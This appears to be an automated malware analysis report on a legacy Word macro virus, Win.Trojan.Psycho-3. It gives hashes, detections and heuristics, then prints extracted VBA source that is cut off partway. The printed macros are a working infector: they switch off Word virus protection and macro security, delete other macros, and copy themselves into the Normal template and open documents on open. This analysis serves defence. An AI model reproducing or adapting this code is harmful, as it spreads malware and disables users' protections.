Win.Trojan.Psycho-3 Office (OLE) malware analysis — malicious · 3627de818d3a029f

MALICIOUS

Office (OLE)

40.5 KB Created: 2002-06-13 16:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: a60ac6952d05a45cd0414fcc15ee0abb SHA-1: 53d3904e5170ed5234045e352e4f7f625be3e26d SHA-256: 3627de818d3a029f0cdc53aa05423f963fee4789b962e28c5b3f95df99eee7dd

260 Risk Score

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic

The file exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to initiate malicious execution upon document opening. ClamAV detections indicate it is a known trojan, identified as Win.Trojan.Psycho-3 and Win.Trojan.wmvg-1 on an extracted artifact. The VBA script appears to be designed to infect other documents and potentially spread.

Heuristics 5

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13636 bytes
SHA-256: `59ca8288bc1e764391feaed8cae280bc4b35ac3f3f75afedd0c2cbac8499454b`
Detection ClamAV: Win.Trojan.wmvg-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "DPMmay2000" Sub ToolsMacro() 'Create by Yean Sin from DPM May 2000 TARC(Kampar, Perak) 'The purpose is to delete another virus on the computer lab End Sub Sub ViewVBCode() End Sub Sub FileTemplates() End Sub Sub DisPrompt() Options.SaveNormalPrompt = False Options.SavePropertiesPrompt = False Options.VirusProtection = False End Sub Sub ToolsOptions() On Error GoTo StopExit Options.SaveNormalPrompt = True Options.SavePropertiesPrompt = True Options.VirusProtection = True Dialogs(wdDialogToolsOptions).Show DisPrompt StopExit: End Sub Sub InfactAc() On Error GoTo StopExit Dim AcInfacted As Boolean AcInfacted = False For Each Obj In ActiveDocument.VBProject.VBComponents If Obj.Name = "DPMmay2000" Then AcInfacted = True If Obj.Name <> "DPMmay2000" And Obj.Name <> "ThisDocument" Then Application.OrganizerDelete Source:=ActiveDocument.FullName, _ Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems End If Next Obj Nor = NormalTemplate.FullName & "CCIP/DPM" Ac = ActiveDocument.FullName & "CCIP/DPM" If AcInfacted = False Then Application.OrganizerCopy Source:=Left(Nor, Len(Nor) - 8), _ Destination:=Left(Ac, Len(Ac) - 8), Name:="DPMmay2000", _ Object:=wdOrganizerObjectProjectItems ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End If StopExit: End Sub Sub InfactNor() On Error GoTo StopExit Dim NorInfacted As Boolean NorInfacted = False For Each Obj In NormalTemplate.VBProject.VBComponents If Obj.Name = "DPMmay2000" Then NorInfacted = True If Obj.Name <> "DPMmay2000" And Obj.Name <> "ThisDocument" Then Application.OrganizerDelete Source:=NormalTemplate.FullName, _ Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems End If Next Obj If NorInfacted = False Then Application.OrganizerCopy Source:=ActiveDocument.FullName, _ Destination:=NormalTemplate.FullName, Name:="DPMmay2000", Object:=wdOrganizerObjectProjectItems NormalTemplate.Save End If StopExit: End Sub Sub Clear97() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (5 - 5): Options.VirusProtection = (3 - 3): Options.SaveNormalPrompt = (2 - 2) End If Set AcDoc = ActiveDocument.VBProject.VBComponents.Item(1) Set NorDoc = NormalTemplate.VBProject.VBComponents.Item(1) AcDocLine = AcDoc.CodeModule.CountOfLines NorDocLine = NorDoc.CodeModule.CountOfLines If AcDocLine <> 0 Then AcDoc.CodeModule.deleteLines 1, AcDocLine End If If NorDocLine <> 0 Then NorDoc.CodeModule.deleteLines 1, NorDocLine End If End Sub Sub Inf() InfactNor InfactAc Clear97 End Sub Sub FileOpen() On Error Resume Next WordBasic.DisableAutoMacros True If Dialogs(wdDialogFileOpen).Show <> 0 Then Inf End If WordBasic.DisableAutoMacros False End Sub Sub AutoOpen() On Error Resume Next DisPrompt Inf End Sub Sub AutoClose() DisplayMsg End Sub Sub DisplayMsg() On Error GoTo StopExit If Day(Date) = 13 Then For i = 0 To 1300 Beep Next MsgBox " We have finished DPM course in 2001 with" & vbCrLf & _ " the help of all CCIP and DPM course Lacturers," & vbCrLf & _ " we would like to express our highest gratitude to them." & vb ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.